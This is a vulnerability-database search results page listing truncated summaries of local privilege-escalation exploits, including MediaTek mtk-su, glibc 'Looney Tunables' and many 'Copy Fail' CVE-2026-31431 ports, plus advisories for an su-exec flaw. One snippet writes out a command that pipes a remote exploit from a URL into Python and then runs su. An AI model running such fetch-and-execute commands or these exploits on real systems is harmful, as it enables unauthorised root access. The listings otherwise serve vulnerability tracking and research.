Lucene search
+L

6837 matches found

Kitploit
Kitploit
added 2026/09/14 6:05 p.m.7 views

AutomatedRoot

AutomatedRoot Rootea dispositivos MediaTek usando el exploit mtk-su CVE-2020-0069. Requisitos Python 3.9 o más reciente en %PATH% para Windows. ADB en %PATH% para Windows. El PoC del CVE-2020-0069 mtk-su. Uso Descarga los binarios de mtk-su desde la página de MediaTek's SU en XDA y muévelos a sus...

7.8CVSS7.6AI score0.0137EPSS
SaveExploits2References2
Kitploit
Kitploit
added 2026/09/14 1:50 p.m.6 views

CVE-2023-4911

CVE-2023-4911 This is a PoC for CVE-2023-4911 "Looney Tunables" that exploits a bug in the glibc dynamic loader's GLIBCTUNABLES environment variable parsing function parsetunables. This is a rewrite of the C PoC's into a pure python approach. I did this to make it easier to customize the exploit...

7.8CVSS7.1AI score0.81422EPSS
SaveExploits28References1
Kitploit
Kitploit
added 2026/09/14 12:56 p.m.5 views

mtk_su

MTK SU MTK SU es una LPE para CVE-2020-0069. Este exploit fue probado en un TCL LX A502DL con un SoC MediaTek MT6739 que ejecuta Android 8.1.0. Compilación root@kitploit: mkdir build cd build export ANDROIDNDK= cmake -DCMAKETOOLCHAINFILE="$ANDROIDNDK?/build/cmake/android.toolchain.cmake"...

7.8CVSS7.7AI score0.0137EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/14 11:37 a.m.9 views

copyfail-deconstructed

copyfail-deconstructed Versión fácil de entender de CVE-2026-31431, una técnica de escalada de privilegios que permite a cualquiera convertirse en root. La prueba de concepto original se encuentra aquí: https://github.com/theori-io/copy-fail-CVE-2026-31431, pero está fuertemente comprimida y...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/14 7:00 a.m.4 views

mtk-su-reverse-cve-2020-0069

mtk-su solo algunas de mis notas Tabla de cadenas obtén la tabla de cadenas descomprimida usando binwalk -Xe stringtabledump vuelca desde la dirección en el idb 0x1F098 tamaño comprimido: 1260 si quieres el idb, abre un issue con tu correo y te lo enviaré. es un buen punto de partida si quieres...

7.8CVSS7.6AI score0.0137EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/10 1:42 a.m.9 views

Linux-CopyFail-C-Version-CVE-2026-31431

Linux CopyFail- C Version - CVE-2026-31431 Clean C version of Copy Fail CVE-2026-31431 - Linux Local Privilege Escalation exploit using AFALG + authencesn + splice primitive. Overwrites the page cache of /usr/bin/su with a tiny setuid shellcode to gain root privileges. Educational proof-of-concep...

7.8CVSS6.5AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/10 1:42 a.m.5 views

copy-fail-python

copyfailsu.py Python port of badsectorlabs/copyfail-go CVE-2026-31431. Linux only; requires Python 3.10+ os.splice. How it gets root important This tool does not use the /etc/passwd page-cache trick. It overwrites the page cache of the setuidsu binary with embedded shellcode same payloads as the ...

7.8CVSS6.5AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/10 1:03 a.m.5 views

TEST-CVE-2026-31431

TEST-CVE-2026-31431 root@kitploit: oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431 oc rsh -n default deployment/test-cve-2026-31431 sh-5.1$ id uid=10011001 gid=0root groups=0root sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su root@test-cve-2026-31431-78f6d9cc97-n7d...

7.8CVSS5.8AI score0.99907EPSS
SaveExploits242
Kitploit
Kitploit
added 2026/09/10 12:56 a.m.4 views

CVE-2026-31431-rs

CVE-2026-31431 PoC copyfail Structure root@kitploit: src/ ├── main.rs Exploit: AFALG + splice to overwrite /bin/su └── bin/ └── payload.rs Payload Self-contained nostd binaries with zero runtime dependencies: poc-rs: 4.1 KB payload embedded via includebytes! payload: 1.7 KB Build Requires Rust...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242
Kitploit
Kitploit
added 2026/09/10 12:51 a.m.8 views

copy-fail-CVE-2026-31431

CVE-2026-31431 — Copy Fail Linux kernel local privilege escalation via AFALG + splice page-cache overwrite For authorized security research, penetration testing, and educational purposes only. Do not use against systems you do not own or have explicit written permission to test. Technical Writeup...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242References2
Kitploit
Kitploit
added 2026/09/10 12:09 a.m.11 views

copy-fail-go

Copy Fail - CVE-2026-31431 - golang version ⚠️ WARNING: This program is highly dangerous and experimental. Manual cleanup is required to clear the exploit. Use at your own risk! Technical Writeup original repo run check /usr/bin/su before run: root@kitploit: user@pc:$ hexdump -n 300 -x /usr/bin/su...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/09 6:01 p.m.10 views

CVE-2026-31431-exploit

CVE-2026-31431 WARNING These Linux LPE exploit implementations are runtime-destructive. They overwrite the live page-cache view of privileged targets such as: su PAM configuration files any file passed into patch mode This is usually not a normal persistent on-disk edit, but it does change runtim...

7.8CVSS6.5AI score0.99907EPSS
SaveExploits242References2
Kitploit
Kitploit
added 2026/09/09 11:39 a.m.9 views

CVE-2026-31431

AFALG su memory‑patch exploit research A compact Python script that exploits an AFALG‑related kernel vulnerability to patch the su binary in memory and escalate privileges. This is provided for educational and research purposes only. ⚠️ Do not use this on any system you do not own or without...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242
Kitploit
Kitploit
added 2026/09/09 5:33 a.m.8 views

copyfail-go

CopyFail Go La mayoría de los LPE de Linux necesitan una ventana de carrera o un offset específico del kernel. Copy Fail es una falla lógica en línea recta: no necesita ninguna de las dos. El mismo script de Python de 732 bytes binario estático de Go obtiene privilegios root en todas las...

7.8CVSS6.5AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/09 4:02 a.m.10 views

cve-2026-31431

CVE-2026-31431 This document describes a public Python exploit related to the CVE-2026-31431 vulnerability. The code demonstrates the exploitation of the flaw using primitives from the Linux AFALG subsystem, AEAD cryptographic operations, and memory manipulation via splice, with the goal of...

7.8CVSS6.4AI score0.99907EPSS
SaveExploits242
Kitploit
Kitploit
added 2026/09/08 8:48 p.m.7 views

CVE-2020-0069_poc

Descripción Este repositorio contiene los materiales que utilizamos para investigar CVE-2020-0069 en un Xiaomi Redmi 6a con un SoC Mediatek MT6762M. Hay tres programas: kernelrw.c un programa en C que permite leer/escribir memoria del kernel poc.sh un script de shell syscallhook.c una biblioteca ...

7.8CVSS7.6AI score0.0137EPSS
SaveExploits2
NVD
NVD
added 2026/08/29 2:16 p.m.21 views

CVE-2026-82457

su-exec through 0.3 fails to validate numeric user and group identifiers parsed with strtol before assigning to uidt and gidt, allowing truncation of out-of-range values to zero. Attackers can supply large numeric identifiers that truncate to root's identifier, causing su-exec to execute target...

8.5CVSS0.0012EPSS
SaveExploits0References4
CVE
CVE
added 2026/08/29 1:47 p.m.38 views

CVE-2026-82457

su-exec through version 0.3 contains a type-truncation vulnerability in its handling of numeric user and group identifiers. Values parsed via strtol are not validated before being assigned to uid_t and gid_t , so out-of-range identifiers truncate to zero—root 's ID. A local attacker with low priv...

8.5CVSS5.9AI score0.0012EPSS
SaveExploits0References4
OSV
OSV
added 2026/08/29 1:47 p.m.21 views

CVE-2026-82457 su-exec through 0.3 Privilege Escalation via Numeric User ID

su-exec through 0.3 fails to validate numeric user and group identifiers parsed with strtol before assigning to uidt and gidt, allowing truncation of out-of-range values to zero. Attackers can supply large numeric identifiers that truncate to root's identifier, causing su-exec to execute target...

8.5CVSS5.9AI score
SaveExploits0References6
Cvelist
Cvelist
added 2026/08/29 1:47 p.m.39 views

CVE-2026-82457 su-exec through 0.3 Privilege Escalation via Numeric User ID

su-exec through 0.3 fails to validate numeric user and group identifiers parsed with strtol before assigning to uidt and gidt, allowing truncation of out-of-range values to zero. Attackers can supply large numeric identifiers that truncate to root's identifier, causing su-exec to execute target...

8.5CVSS0.0012EPSS
SaveExploits0References4
Rows per page
Query Builder